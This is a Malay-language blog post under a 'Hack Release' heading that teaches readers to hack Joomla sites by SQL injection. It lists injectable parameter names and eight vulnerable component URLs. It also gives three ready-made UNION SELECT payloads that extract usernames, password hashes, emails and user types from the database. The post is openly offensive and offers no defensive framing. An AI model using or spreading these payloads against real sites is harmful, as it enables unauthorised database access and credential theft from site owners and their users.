Home > Hack Release > Hack Joomla

Hack Joomla

Jom hari ni kita hack joomla. jom jom..
Korang akan nampak lebih kurang cam ni
index.php?option=com_blabla&category=5&Item=2

Parameters cam ni..
 – cat, category, kat, categories, kats, cats
– id, userid, katid, catid
– sometimes also Item, entry, page
Contoh.. category=5 to category=’

Tekan enter dan tengok MySQL error yg ada dalam site Joomla
Untuk menunjukkan dengan lebih jelas lagi.. kat sini I bagi beberapa contoh yang i dah jumpe..
URL: index.php?option=com_jp_jobs&view=detail&id=1
Vulnerable parameter: id

URL: index.php?option=com_mv_restaurantmenumanager&task=menu_display\
&Venue=XX&mid=XX&Itemid=XX
Vulnerable parameter: mid

URL: index.php?option=com_qpersonel&task=qpListele&katid=2
Vulnerable parameter: katid

URL: index.php?com_pandafminigames&Itemid=&task=myscores&userid=2
Vulnerable parameter: userid

URL: index.php?option=com_joltcard&Itemid=21&task=view&cardID=6
Vulnerable parameter: cardID

URL: index.php?com_bfquiztrial&view=bfquiztrial&catid=1&Itemid=62
Vulnerable parameter: catid

URL: index.php?com_golfcourseguide&view=golfcourses&cid=1&id=79
Vulnerable parameter: id

URL: index.php?option=com_nkc&view=insc&lang=en&gp=10
Vulnerable parameter: gp

Camne? jadi korang kena lebih explore.. kena perah otak lagi.. xD~
Memandangkan Joomla mempunyai Struktur database yang sama.. Di sini I bagi contoh lg..
Contoh #1:
index.php?option=com_qpersonel&task=qpListele&katid=XX+AND+1=2+UNION+\
SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(\
username, password)–
Contoh #2:
index.php?option=com_pandafminigames&Itemid=&task=myscores&userid=XX+\
AND+1=2+UNION+SELECT+concat(password),2,concat(password),4,5,6,7,\
8,9,10,11,12–
Contoh #3:
index.php?option=com_jp_jobs&view=detail&id=1+AND+1=2+UNION+SELECT+\
group_concat(0x503077337220743020743368206330777321,name,username,\
password,email,usertype,0x503077337220743020743368206330777321)–
SQL Injectiondengan Joomla mmg menarik bila dah tahu.. Korang boleh cari seberapa banyak informasi database yang ada dalam Joomla..Ketemu lagi ya..
credit to: masta darkcruise
Categories: Hack Release
  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: